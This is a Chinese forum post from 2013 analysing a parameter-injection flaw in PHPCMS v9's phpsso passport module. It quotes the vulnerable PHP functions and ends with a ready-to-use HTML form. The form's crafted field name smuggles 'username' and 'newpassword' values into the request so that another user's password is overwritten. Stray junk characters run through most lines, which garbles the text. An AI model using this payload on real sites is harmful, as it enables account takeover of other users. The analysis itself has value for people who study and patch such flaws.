提到的通行证的代码:, ^4 h6 D6 q& P) L- l& G, O" l
8 M3 ]& s4 t8 \# e* ~6 r
% }3 O8 I2 k5 M$ A9 [5 @8 \parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
: _3 ?* c0 M; w# T, w
4 K, V5 R8 R+ |: S在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。" @. d7 _7 b( S: S
% V4 K7 T% ?" o5 M& Z我把它留给了你们。
1 h% \8 t4 m- h8 h4 t不知道你们发现了它没有。
+ x6 Z' w/ O; Z9 B4 i+ x2 q/ S$ h6 C( q( J
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
- j+ N+ d9 L2 U: T
4 ]" ?1 r- ~9 d( C, U7 I所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。1 M* j. T$ x* `# C# S
9 t" |, d4 e! F [0 _0 Y! L$ }
也就是
' }8 l* ^$ i. H5 z% ]- q4 l- ]$ n7 N. W. f
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。) k6 r9 J0 Z% X' L1 U z
" C0 J, I9 ?( @, k A' K7 v2 O4 T要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
( ]) _5 c1 Z: G' Y& Y, a- w$ g2 J6 K9 b
$ a# J; l, e* `) t
其实我们有这样的机会,看看代码,如下:
" T$ h9 t, |1 M* s0 h
4 P3 ]) g+ S8 _+ @4 I* t3 B% B* h& J! _
public function auth_data($data) {/ e( g* _% @& e& [% ~5 f
$s = $sep = '';# d/ X c" P( o1 T: ?6 U$ D
foreach($data as $k => $v) {
* j! r) f0 U: p: |/ A if(is_array($v)) {
/ H0 k7 x; x0 r1 t% f. s $s2 = $sep2 = '';
% o! } R w1 d1 C2 e foreach($v as $k2 => $v2) {7 M; |: ^- b4 d8 {. V: R# ?( t
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
( S2 n7 @" h, v4 I0 e4 k" U8 O7 } $sep2 = '&';
* Q- w* T. Y& W. z0 Z8 T }7 ]$ ^$ ~% Y5 G
$s .= $sep.$s2;
2 Z; E7 t: y+ v n- \6 R } else {' g( S/ Y& M+ S5 M4 c) u3 j' F. `% B0 Z
$s .= "$sep$k=".$this->_ps_stripslashes($v);) F' e! H C) O i8 W
}4 d' ?" L7 d. n- [ Y8 S; B
$sep = '&';
) P2 C1 A, D- l7 {, E7 a2 K( r7 k2 C& C }. @ y2 G- s/ k0 W* b5 X
& p1 k8 Q' s7 b8 d( H0 A. {
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));1 b/ G2 A: W7 z6 z, Q9 D3 p: H
return $auth_s;
6 @1 O) E: E) d' O% M, {+ k! ? }' [0 B" E6 N# g; D+ V8 r7 E8 w
; G# y ], J4 Z6 Q5 R9 ?可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
- b5 I$ A# v) F, L; k9 s4 W8 R( j4 G) e3 Z$ C, w4 F3 @( o1 {( ~
举个例子
3 ^3 W' d% s% N
/ E8 W! S4 D4 o& y* o- @$ ]$a[aaa=a&bbb] = 'a';
% W" q- K# Y9 V+ k6 H- @, H& @! [, ]' @& q
会变成aaa=a&bbb=a
7 s0 U a9 Y, x' A6 G. j: t
1 S7 |( q+ m7 Z0 Y9 m# k' o! F明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
$ H( k( j C3 l+ |7 `. p$ b) y$ Y, w* P8 }' z. g
这个时候,我们可以再去看一个函数。$ p& `; D' C' i; F1 l- n
" F: ?& r( D% I% _$ j' R$ \就在这个文件内:
7 F# V5 ~# x8 |" ^% R* t
, \# O& {# L& L
, d* S2 D G$ {) E' mpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
: V+ A' z( n( I, d if($email && !$this->_is_email($email)) {3 W: o! I* f6 j8 v1 f. h1 ^% C
return -4;
& S( s0 l& O# b, t% h, |# @ }1 O9 q& X S0 R* c
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));, v8 i% y3 G5 M
}& \) i4 `. g4 d0 G- _" \
( l+ C+ X: f$ ?1 \6 @& {" ~这是向通行证发了这样一个请求。
; O. ]/ D) q! p: ~2 C0 `1 L% D; T( x! `
我们再跟到通信证代码里去看看,就会有所发现。$ I# \2 o% L; F; G& _# A
; C. J) F! N# U8 H; F2 O* P; M
9 l# }2 f( i( K) J. Ppublic function edit() {
& V. Q# ~6 S1 [( U7 X1 J& m//能省就省,太长了不是吗?
3 i T* Y# I9 p: g2 `5 t; U/ |8 z' c) Y& F3 X5 T
if($this->username) {6 [ {* A) n, u% J+ }; d- k" T2 a
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
! l: M7 J4 k! Z- O) j $res = $this->db->update($data, array('username'=>$this->username));* W: d7 E3 H2 Q% u3 s2 d7 V* A
} else {; \& H. {# X ~- t4 w! T5 b$ u% Z
file_put_contents('typeb.txt',print_r($data,1).$this->uid);( U) q1 ^4 B# [" X, q
$res = $this->db->update($data, array('uid'=>$this->uid));
( k }) Y7 I; S$ {) v2 m- D0 n2 z( ^ }
F% d( [ r' z$ m T# U1 W2 Q. t3 d1 D8 v4 t+ \
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
, n7 F8 R3 e6 @2 R7 O7 I2 H7 j# X2 \% x( F1 ?. F
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random=''), j5 e0 M4 c9 S5 z T
9 f. k) _+ Y$ t5 Y. J _# Q
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
. |8 {! A6 K+ w( ]! N
6 X. t* I- n# o" P我当然找到了: Q! {; K6 v6 G, J( N# u) A+ O! K! V
phpcms9/phpcms/modules/member/index.php+ \9 _' y# B$ u3 ~# o( b2 S
* ]: u7 B( @/ | a7 B
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
% n# L+ g8 u* x% e$ x: n; Z0 c7 A6 r, u8 L
然后就没有然后了。, {3 a5 k" q) i8 [- S- \8 A6 G
2 D2 }4 n' `5 o
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
! K/ N6 s O3 n1 s <table width="100%" cellspacing="0" class="table_form">
) V" W* [0 N% J: j7 h4 }6 I <tr>
6 N6 i3 A7 B6 q7 ?: S <th width="80">邮箱:</th> $ C+ L6 j4 X# ~( K' y8 |
<td><input name="info[email]" type="text" id="email" size="30" value="[email protected]" class="input-text"></td>! x2 z0 B" G# C) c- x4 a
</tr>
* T# S. P) j" w$ V1 p; g <tr>
' f2 @' ]6 J5 ]3 \0 j6 G) _ <th width="80">原密码:</th> $ a& ^: b0 F5 {9 r7 r
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>& b- L. f" H# T" Q
</tr>7 u, x* L7 }0 i% f" }
<tr>
, d0 @2 a8 f1 a. d <th>新密码:</th>
) j5 U0 T8 C z1 v6 E( T& D <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>' v! W% D* U* @5 i
</tr>. p1 D* K# u' F! m
<th></th>( d( J# O+ r, @1 W; T0 Y
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
& Z4 m1 E, `' y! s5 M5 Z2 |) a0 g </tr>4 ?& X9 E7 F5 R% K8 d% }! \" [( i; A
</table>* n. m# S4 [" ^8 O( Z
5 K& d9 d" x6 N# P
$ Z) w4 q8 n& T! A7 S# L5 i
</form>; v2 Q6 p t9 u$ s+ g/ P# Q* `' y
|
发表于 2013-2-23 14:46:35
收藏
分享
支持
反对